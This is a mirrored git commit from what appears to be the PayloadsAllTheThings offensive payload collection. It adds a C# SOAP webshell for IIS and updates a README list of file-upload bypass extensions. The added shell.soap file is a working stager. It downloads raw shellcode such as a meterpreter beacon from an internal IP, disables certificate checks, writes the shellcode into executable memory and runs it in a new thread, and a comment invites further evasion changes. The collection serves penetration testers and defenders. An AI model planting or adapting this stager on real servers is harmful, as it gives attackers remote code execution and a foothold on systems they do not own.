mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
SOAP File Upload
This commit is contained in:
parent
f8a7f1ded5
commit
578ea4d12b
2 changed files with 58 additions and 2 deletions
55
Upload Insecure Files/Extension ASP/shell.soap
Normal file
55
Upload Insecure Files/Extension ASP/shell.soap
Normal file
|
@ -0,0 +1,55 @@
|
|||
<%@ WebService Language="C#" class="SoapStager"%>
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Web;
|
||||
using System.Web.Services;
|
||||
using System.Net;
|
||||
using System.Net.NetworkInformation;
|
||||
using System.Net.Security;
|
||||
|
||||
// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap
|
||||
// https://github.com/0xbad53c/webshells/tree/main/iis
|
||||
|
||||
[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")]
|
||||
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
|
||||
public class SoapStager : MarshalByRefObject
|
||||
{
|
||||
private static Int32 MEM_COMMIT=0x1000;
|
||||
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
|
||||
|
||||
|
||||
[System.ComponentModel.ToolboxItem(false)]
|
||||
[WebMethod]
|
||||
public string loadStage()
|
||||
{
|
||||
string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode
|
||||
byte[] rzjUFlLZh;
|
||||
|
||||
IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy;
|
||||
defaultWebProxy.Credentials = CredentialCache.DefaultCredentials;
|
||||
|
||||
// in case of HTTPS
|
||||
using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy })
|
||||
{
|
||||
ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
|
||||
ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; });
|
||||
webClient.UseDefaultCredentials = true;
|
||||
rzjUFlLZh = webClient.DownloadData(Url);
|
||||
}
|
||||
|
||||
|
||||
// Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion
|
||||
IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length);
|
||||
IntPtr owlqRoQI_ms = IntPtr.Zero;
|
||||
IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms);
|
||||
|
||||
return "finished";
|
||||
}
|
||||
}
|
|
@ -43,7 +43,7 @@
|
|||
.phtm
|
||||
.inc
|
||||
```
|
||||
* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
|
||||
* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap`
|
||||
* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf`
|
||||
* Perl: `.pl, .pm, .cgi, .lib`
|
||||
* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
|
||||
|
@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload
|
|||
* [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
||||
* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
|
||||
* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
|
||||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
Loading…
Reference in a new issue